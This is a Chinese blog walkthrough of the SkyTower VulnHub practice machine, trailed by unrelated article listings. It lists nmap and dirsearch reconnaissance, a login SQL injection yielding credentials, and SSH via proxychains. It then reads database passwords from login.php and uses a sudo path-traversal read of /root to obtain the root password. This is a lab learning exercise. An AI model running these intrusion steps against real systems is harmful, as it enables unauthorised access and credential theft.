SkyTower靶机渗透测试

最新推荐文章于 2024-07-31 21:07:43 发布
最新推荐文章于 2024-07-31 21:07:43 发布
阅读量233 收藏 2
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140831341
版权

一、靶机下载地址

SkyTower: 1 ~ VulnHub

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:54:4A:37'

2、端口扫描

# 使用命令
nmap 192.168.7.61 -p- -sV

3、指纹识别

# 使用命令
whatweb http://192.168.7.61

4、目录扫描

# 使用命令
dirsearch -u "http://192.168.7.61"

三、获取shell权限和提权

1、访问靶机IP地址,为一个登录界面

2、使用burp抓包,尝试sql注入,发现账号和密码为john:hereisjohn

3、尝试使用获取到的账号和密码进行ssh登录发现未登录成功,尝试编辑代理

# 使用命令
vim /etc/proxychains4.conf

4、编辑完代理后使用proxychains进行连接

# 使用命令
proxychains ssh john@192.168.7.61 -t "/bin/sh"

5、输入sudo -l发现不能使用sudo提权

# 使用命令
sudo -l

6、 login.php存在sql注入,查看下login.php文件,发现数据库的账号和密码

# 使用命令
cat /var/www/login.php

7、连接数据库

# 使用命令
mysql -u root -p

8、查看数据库信息

# 使用命令
show database;

9、查看SkyTech数据库下的表名

# 使用命令
use SkyTech;

show tables;

10、查看表下的数据

# 使用命令
select * from login

11、使用ssh连接sara用户

# 使用命令
proxychains ssh sara@192.168.7.61 -t "/bin/sh"

12、 再次使用sudo -l查看权限

# 使用命令
sudo -l

13、 我们利用accounts/的权限,查看root下的文件,发现root用户的密码为theskytower

# 使用命令
sudo ls /accounts/../root

sudo cat /accounts/../root/flag.txt

14、 使用ssh连接root用户,提权成功

# 使用命令
proxychains ssh root@192.168.7.61 -t "/bin/sh"

果冻*果冻*
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SkyTower:动作平台游戏,爬塔到天上去
06-08
SkyTower: 动作平台游戏的开发与技术解析》 在游戏开发的世界里,"SkyTower"是一款引人入胜的动作平台游戏,其核心玩法是挑战玩家攀登高耸入云的天空塔。这款游戏的独特之处在于它融合了动作、平台跳跃和攀登元素...
VulnHub靶机-SkyTower
Slow_的博客
02-26 652
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
渗透测试靶机----SkyTower
久恙502的博客
01-17 1995
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
VulnHub-SkyTower: 1-靶机渗透学习
嗯嗯呐的博客
12-18 1234
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方面方法攻击系统并获得“标志”的能力。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap扫描靶机地址 nmap扫描端口 22 SSH 80 http
靶机渗透】SkyTower渗透练习_proxytunnel设置代理服务器隧道+.bashrc文件概念
serendipity1130的博客
08-31 565
SkyTower靶机: 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.168 2.nmap扫描端,口扫描到22和80端口,访问80端口: nmap 192.168.225.168 -sV -sC -Pn -n -v -T5 -p- 但是注意:这里的22端口被过滤了,百度查询squid发现这个是用来设置代理的 3.现在访问一下网站,看到登录框,测试发现存在注入漏洞: 4.因为过滤了and,将其替换为|| 123' || 1=1# ...
web安全基础学习
m0_71332744的博客
07-31 147
记录学习的原理,少有实操持续更新
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 639
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
探索GAN 在改善网络安全方面的作用
知来者逆的博客
07-25 658
GAN 是一类机器学习框架,由两个神经网络组成——生成器和鉴别器。这两个网络在一个动态过程中竞争,生成器创建数据样本,鉴别器对其进行评估。生成器的目标是尽可能地生成与实际样本相似的数据。而鉴别器的目标是区分真实数据和生成的数据。在训练过程中,这种对抗关系促使两个网络不断改进。生成器会改进其输出以创建更令人信服的数据,而鉴别器则会提高其检测细微差异的能力。这种竞争会产生高度逼真的数据,使得 GAN 对于需要创建合成数据和网络安全中稳健测试场景的任务非常有用。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 757
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 555
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1335
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
由“微软蓝屏”事件引发的对网络安全与系统稳定性的思考
qq_37524903的博客
07-23 861
近日,一场由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,震动了整个科技领域。它不仅成为热点新闻,更是对全球 IT 基础设施韧性与安全性的一次深度检验。此次事件的源头是美国电脑安全技术公司“众击”提供的一个存在“缺陷”的软件更新,这个看似微不足道的问题,却如同一颗隐形炸弹,在全球范围内瞬间引爆。近 850 万台设备因此遭遇故障,波及航空、医疗、传媒等众多关键行业。其中,仅在美国就导致超过 2.3 万架次航班延误,其影响之广,令人瞠目结舌。
chromedriver-mac-x64_122.0.6217.0.zip
07-31
chromedriver-mac-x64_122.0.6217.0.zip
多元宇宙算法优化长短记忆网络MVO-LSTM故障诊断分类【含Matlab源码 6074期】.zip
07-31
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化LSTM分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化LSTM 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化LSTM 4.4.3 灰狼算法GWO/狼群算法WPA优化LSTM 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化LSTM 4.4.5 萤火虫算法FA/差分算法DE优化LSTM 4.4.6 其他优化算法优化LSTM
全国大学生电子设计竞赛(电赛)相关资源(流程、模板、心得、历届资料等).docx
07-31
全国大学生电子设计竞赛(简称电赛)是一项旨在促进大学生电子设计能力提升和创新能力培养的全国性学科竞赛。以下是对电赛相关资源(流程、模板、心得、历届资料等)的详细概述: 一、竞赛流程 全国大学生电子设计竞赛的流程通常包括以下几个关键步骤: 报名与组队:参赛学生需按照学校或赛区的规定时间进行报名,并组成三人一队的小组。报名时需确定参赛的组别(如本科生组或高职高专学生组)。 培训与准备:参赛队伍在比赛前需进行充分的准备,包括学习相关电子设计知识、掌握必要的软硬件技能、熟悉竞赛规则等。学校或赛区可能会组织培训课程、模拟竞赛等活动帮助参赛队伍提升能力。 竞赛开始:竞赛通常在单数年的8月份举行,为期四天三夜。竞赛当天公布题目,参赛队伍需在规定时间内完成作品设计、制作及报告撰写。 作品提交与评审:竞赛结束后,参赛队伍需将作品及报告提交给赛区组委会进行评审。评审工作包括初评和复评两个阶段,最终评选出获奖队伍。 二、竞赛模板 在电赛中,参赛队伍需要提交的作品报告通常需要遵循一定的模板格式。以下是一个简化的作品报告模板示例: 封面:包括作品名称、参赛队伍信息(队伍名称、成员姓名、学校名称等)、竞赛日
chromedriver-mac-arm64_128.0.6534.0.zip
07-31
chromedriver-mac-arm64_128.0.6534.0.zip
基于场景划分的智能网联汽车协同换道避障方法_周俊宇.caj
07-31
基于场景划分的智能网联汽车协同换道避障方法_周俊宇
chromedriver-mac-x64_122.0.6172.0.zip
07-31
chromedriver-mac-x64_122.0.6172.0.zip
面向自动驾驶道路场景中异常案例的多模态数据挖掘算法_王海.caj
最新发布
07-31
面向自动驾驶道路场景中异常案例的多模态数据挖掘算法_王海
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值